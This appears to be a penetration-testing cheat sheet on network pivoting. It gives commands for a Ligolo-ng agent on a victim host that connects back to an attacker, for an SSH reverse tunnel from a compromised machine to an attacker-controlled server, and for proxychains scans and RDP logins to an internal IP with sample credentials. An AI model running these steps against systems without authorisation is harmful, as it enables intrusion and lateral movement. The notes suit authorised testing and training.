# Pivoting (Proxying) ## Method 1: Ligolo-ng **Ligolo** is a *simple* and *lightweight* tool for establishing *SOCKS5* or *TCP* tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve). * **1) To run the proxy on your victim host:** `./ligolo.exe -connect : -ignore-cert` **2) To run the server on your attack host:** * Start server * `sudo ./proxy -selfcert -laddr 0.0.0.0:` * List session once established and see networks * `session` * `ifconfig` * Add a route into the network via ligolo TUN adapter * `sudo ip route add /24 dev ligolo` * start tunnel on ligolo * `tunnel_start` ## Method 2: SSH Reverse Proxy SSH can natively perform pivoting. In the example below, we have three machines: 1. The SSH server 2. The attack host 3. The victim host (in an internal network) * On your SSH server, setup an SSH key: * `ssh-keygen -C attacker@attacker` * Add the generated public key to your SSH servers authorized keys list * `/home//.ssh/authorized_keys` * On your victim host, upload the generated private key and run the following command * `ssh -i -R 1037 -N @` * On your attack host, make the reverse connection to the SSH server * `ssh -i -L 8008:localhost:1037 -vN @` * Now you have a connection from your attack host to the victim host and network * Now proxy any tools through the SOCKS proxy you created at 127.0.0.1:8008. * or use proxychains. ## Sending tools through a pivot (using Proxychains) proxychains forces any TCP connection made by any given application to follow through a proxy * **1) Setup Proxychains with an established SOCKS Pivot** * nano `/etc/proxychains.conf` * add `socks4 127.0.0.1 9050` **2) Execute tools using proxychains to route packets to local port 9050 and SSH forward to victim.** * `proxychains nmap -v -Pn -sT 172.16.5.19` * Only full TCP scans work, SYN scans send half packets that SOCKS doesn't like * `proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123` * `proxychains `